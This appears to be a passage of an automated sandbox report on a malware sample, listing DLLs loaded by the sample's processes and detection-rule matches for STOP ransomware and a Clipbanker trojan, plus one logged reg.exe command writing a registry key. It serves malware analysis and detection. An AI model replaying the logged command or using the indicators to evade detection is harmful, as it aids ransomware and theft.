            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: msimg32.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: dpapi.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: schannel.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeSection loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: msimg32.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: msvcr100.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: powrprof.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: umpdc.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: wtsapi32.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: winsta.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: wbemcomn.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: sxs.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: amsi.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: wbemcomn.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: wbemcomn.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: netapi32.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: samcli.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: samlib.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: wbemcomn.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: wbemcomn.dll
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: slc.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dll
            Source: C:\Windows\explorer.exeSection loaded: aepic.dll
            Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
            Source: C:\Windows\explorer.exeSection loaded: userenv.dll
            Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
            Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
            Source: C:\Windows\explorer.exeSection loaded: wininet.dll
            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
            Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
            Source: C:\Windows\explorer.exeSection loaded: wldp.dll
            Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
            Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
            Source: C:\Windows\explorer.exeSection loaded: netutils.dll
            Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
            Source: C:\Windows\explorer.exeSection loaded: ninput.dll
            Source: C:\Windows\explorer.exeSection loaded: appresolver.dll
            Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dll
            Source: C:\Windows\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\explorer.exeSection loaded: sppc.dll
            Source: C:\Windows\explorer.exeSection loaded: profapi.dll
            Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\explorer.exeSection loaded: starttiledata.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Windows\explorer.exeSection loaded: idstore.dll
            Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.applicationmodel.dll
            Source: C:\Windows\explorer.exeSection loaded: appxdeploymentclient.dll
            Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dll
            Source: C:\Windows\explorer.exeSection loaded: wlidprov.dll
            Source: C:\Windows\explorer.exeSection loaded: samcli.dll
            Source: C:\Windows\explorer.exeSection loaded: policymanager.dll
            Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\explorer.exeSection loaded: winsta.dll
            Source: C:\Windows\explorer.exeSection loaded: sndvolsso.dll
            Source: C:\Windows\explorer.exeSection loaded: mmdevapi.dll
            Source: C:\Windows\explorer.exeSection loaded: devobj.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryclient.dll
            Source: C:\Windows\explorer.exeSection loaded: oleacc.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.dll
            Source: C:\Windows\explorer.exeSection loaded: wintypes.dll
            Source: C:\Windows\explorer.exeSection loaded: textshaping.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.ui.dll
            Source: C:\Windows\explorer.exeSection loaded: windowmanagementapi.dll
            Source: C:\Windows\explorer.exeSection loaded: textinputframework.dll
            Source: C:\Windows\explorer.exeSection loaded: inputhost.dll
            Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\explorer.exeSection loaded: appextension.dll
            Source: C:\Windows\explorer.exeSection loaded: windowscodecs.dll
            Source: C:\Windows\explorer.exeSection loaded: dcomp.dll
            Source: C:\Windows\explorer.exeSection loaded: d3d11.dll
            Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dll
            Source: C:\Windows\explorer.exeSection loaded: d3d10warp.dll
            Source: C:\Windows\explorer.exeSection loaded: dxcore.dll
            Source: C:\Windows\explorer.exeSection loaded: d2d1.dll
            Source: C:\Windows\explorer.exeSection loaded: dwrite.dll
            Source: C:\Windows\explorer.exeSection loaded: xmllite.dll
            Source: C:\Windows\explorer.exeSection loaded: dataexchange.dll
            Source: C:\Windows\explorer.exeSection loaded: cldapi.dll
            Source: C:\Windows\explorer.exeSection loaded: fltlib.dll
            Source: C:\Windows\explorer.exeSection loaded: apphelp.dll
            Source: C:\Windows\explorer.exeSection loaded: tiledatarepository.dll
            Source: C:\Windows\explorer.exeSection loaded: staterepository.core.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.staterepository.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dll
            Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorycore.dll
            Source: C:\Windows\explorer.exeSection loaded: mrmcorer.dll
            Source: C:\Windows\explorer.exeSection loaded: twinui.pcshell.dll
            Source: C:\Windows\explorer.exeSection loaded: wkscli.dll
            Source: C:\Windows\explorer.exeSection loaded: wincorlib.dll
            Source: C:\Windows\explorer.exeSection loaded: cdp.dll
            Source: C:\Windows\explorer.exeSection loaded: dsreg.dll
            Source: C:\Windows\explorer.exeSection loaded: languageoverlayutil.dll
            Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.immersiveshell.serviceprovider.dll
            Source: C:\Windows\explorer.exeSection loaded: thumbcache.dll
            Source: C:\Windows\explorer.exeSection loaded: edputil.dll
            Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\explorer.exeSection loaded: photometadatahandler.dll
            Source: C:\Windows\explorer.exeSection loaded: twinui.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: twinui.dll
            Source: C:\Windows\explorer.exeSection loaded: pdh.dll
            Source: C:\Windows\explorer.exeSection loaded: applicationframe.dll
            Source: C:\Windows\explorer.exeSection loaded: ntshrui.dll
            Source: C:\Windows\explorer.exeSection loaded: cscapi.dll
            Source: C:\Windows\explorer.exeSection loaded: linkinfo.dll
            Source: C:\Windows\explorer.exeSection loaded: rmclient.dll
            Source: C:\Windows\explorer.exeSection loaded: ehstorshell.dll
            Source: C:\Windows\explorer.exeSection loaded: cscui.dll
            Source: C:\Windows\explorer.exeSection loaded: holographicextensions.dll
            Source: C:\Windows\explorer.exeSection loaded: virtualmonitormanager.dll
            Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.ui.immersive.dll
            Source: C:\Windows\explorer.exeSection loaded: abovelockapphost.dll
            Source: C:\Windows\explorer.exeSection loaded: npsm.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.web.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.shell.bluelightreduction.dll
            Source: C:\Windows\explorer.exeSection loaded: mscms.dll
            Source: C:\Windows\explorer.exeSection loaded: coloradapterclient.dll
            Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.internal.signals.dll
            Source: C:\Windows\explorer.exeSection loaded: tdh.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorybroker.dll
            Source: C:\Windows\explorer.exeSection loaded: mfplat.dll
            Source: C:\Windows\explorer.exeSection loaded: rtworkq.dll
            Source: C:\Windows\explorer.exeSection loaded: taskflowdatauser.dll
            Source: C:\Windows\explorer.exeSection loaded: structuredquery.dll
            Source: C:\Windows\explorer.exeSection loaded: actxprxy.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.security.authentication.web.core.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.data.activities.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.system.launcher.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.shell.servicehostbuilder.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.internal.ui.shell.windowtabmanager.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.devices.enumeration.dll
            Source: C:\Windows\explorer.exeSection loaded: notificationcontrollerps.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dll
            Source: C:\Windows\explorer.exeSection loaded: icu.dll
            Source: C:\Windows\explorer.exeSection loaded: mswb7.dll
            Source: C:\Windows\explorer.exeSection loaded: devdispitemprovider.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.networking.connectivity.dll
            Source: C:\Windows\explorer.exeSection loaded: uianimation.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.ui.core.textinput.dll
            Source: C:\Windows\explorer.exeSection loaded: windowsudk.shellcommon.dll
            Source: C:\Windows\explorer.exeSection loaded: dictationmanager.dll
            Source: C:\Windows\explorer.exeSection loaded: npmproxy.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
            Source: C:\Windows\explorer.exeSection loaded: winnsi.dll
            Source: C:\Windows\explorer.exeSection loaded: dpapi.dll
            Source: C:\Windows\explorer.exeSection loaded: msasn1.dll
            Source: C:\Windows\explorer.exeSection loaded: rsaenh.dll
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\explorer.exeSection loaded: schannel.dll
            Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
            Source: C:\Windows\explorer.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\explorer.exeSection loaded: ntasn1.dll
            Source: C:\Windows\explorer.exeSection loaded: ncrypt.dll
            Source: C:\Windows\explorer.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\explorer.exeSection loaded: gpapi.dll
            Source: C:\Windows\explorer.exeSection loaded: pcshellcommonproxystub.dll
            Source: C:\Windows\explorer.exeSection loaded: shellcommoncommonproxystub.dll
            Source: C:\Windows\explorer.exeSection loaded: cryptngc.dll
            Source: C:\Windows\explorer.exeSection loaded: cflapi.dll
            Source: C:\Windows\explorer.exeSection loaded: execmodelproxy.dll
            Source: C:\Windows\explorer.exeSection loaded: daxexec.dll
            Source: C:\Windows\explorer.exeSection loaded: container.dll
            Source: C:\Windows\explorer.exeSection loaded: stobject.dll
            Source: C:\Windows\explorer.exeSection loaded: wmiclnt.dll
            Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.fileexplorer.common.dll
            Source: C:\Windows\explorer.exeSection loaded: uiautomationcore.dll
            Source: C:\Windows\explorer.exeSection loaded: samlib.dll
            Source: C:\Windows\explorer.exeSection loaded: batmeter.dll
            Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dll
            Source: C:\Windows\explorer.exeSection loaded: sxs.dll
            Source: C:\Windows\explorer.exeSection loaded: inputswitch.dll
            Source: C:\Windows\explorer.exeSection loaded: es.dll
            Source: C:\Windows\explorer.exeSection loaded: prnfldr.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.ui.shell.dll
            Source: C:\Windows\explorer.exeSection loaded: wpnclient.dll
            Source: C:\Windows\explorer.exeSection loaded: atlthunk.dll
            Source: C:\Windows\explorer.exeSection loaded: dxp.dll
            Source: C:\Windows\explorer.exeSection loaded: shdocvw.dll
            Source: C:\Windows\explorer.exeSection loaded: syncreg.dll
            Source: C:\Windows\explorer.exeSection loaded: audioses.dll
            Source: 6uVlPQSJ4e.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
            Source: 43.2.build3.exe.24115a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 43.2.build3.exe.24115a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 11.2.DB15.exe.28715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 11.2.DB15.exe.28715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 22.2.DB15.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 22.2.DB15.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 18.2.DB15.exe.28915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 18.2.DB15.exe.28915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 11.2.DB15.exe.28715a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 11.2.DB15.exe.28715a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 28.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 28.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 19.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 19.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 28.2.DB15.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 28.2.DB15.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 27.2.DB15.exe.28415a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 27.2.DB15.exe.28415a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 27.2.DB15.exe.28415a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 27.2.DB15.exe.28415a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 12.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 12.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
